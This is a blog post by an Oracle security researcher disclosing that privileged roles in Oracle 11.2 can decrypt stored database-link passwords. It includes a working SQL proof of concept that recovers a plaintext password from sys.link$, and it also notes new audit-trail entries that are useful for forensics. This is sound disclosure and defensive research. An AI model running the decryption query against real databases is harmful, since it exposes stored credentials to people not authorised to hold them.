Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

Database Link Security

Hello Oracle Security folks,

Good news and bad news – which would you like first?

Ok.. so the bad news is that these user/role/privileges can select and decrypt DBLink passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself.
•SYS
•SYSDBA
•DBA
•SYS WITHOUT SYSDBA
•SYSASM
•EXP_FULL_DATABASE
•DATAPUMP_EXP_FULL_DATABASE
•DATAPUMP_IMP_FULL_DATABASE

PoC:

SQL> CREATE DATABASE LINK "TEST_LINK" CONNECT TO "DBLINK_ACCOUNT" IDENTIFIED BY MYPW USING '(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =(PROTOCOL=TCP)(HOST=192.168.0.25)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=ORCL11)))';

Database link created.

SQL> select name, userid, passwordx from sys.link$ where name='TEST_LINK';
NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORDX
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
058CC531A7BBC08390C066B29CB2E26AF1

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
MYPW

The above issue did not make my Top 10 New Oracle Security Issues which I will publish at UKOUG 2012 on Monday http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62.

So the good news is that Oracle audit trail does now highlight incoming DBLink activity including the name of the link from the client database.

select userid, terminal, comment$text from sys.aud$ where comment$text like 'DBLINK%';
USERID         NTIMESTAMP#          USERHOST  COMMENT$TEXT
------------  -----------------     -------   --------------
DBLINK_ACCOUNT	19-NOV-12 01.42.16.305194000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT	19-NOV-12 01.42.17.086395000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT	19-NOV-12 01.42.17.086856000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)

This DBLINK_INFO is very useful and the attached paper expands a little on the subject of DBLink security including Forensic Response…more to come at UKOUG in Birmingham.

Cheers,
Paul

Leave a Reply

You must be logged in to post a comment.